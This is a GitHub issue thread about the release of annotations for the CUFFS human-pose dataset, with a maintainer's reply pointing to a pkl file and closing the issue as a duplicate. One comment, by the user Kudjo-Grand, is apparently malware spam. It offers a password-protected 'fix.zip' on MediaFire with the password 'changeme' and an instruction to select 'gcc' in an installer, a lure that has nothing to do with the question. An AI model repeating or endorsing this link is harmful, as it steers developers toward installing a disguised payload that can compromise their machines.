### ISSUE TITLE
CUFFS dataset annotation release

### ISSUE THREAD

**Issue by nehc0** [naver/multi-hmr#33]
Thank you for your work of collecting the CUFFS dataset. It seems that the dataset is partially released at [this website](https://download.europe.naverlabs.com/ComputerVision/MultiHMR/CUFFS/). The zip file now only contains the images and the annotation is not included. Do you have a plan to release the annotation recently?

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fabienbaradel** [comment]
Thanks for your interest in our work. Indeed the dataset is available at this location. There is a pkl file as well in the directory which contains person poses for each image.
I will share soon more info about how to use it in this issue #14 .
I am closing this issue since this is a duplicate issue.
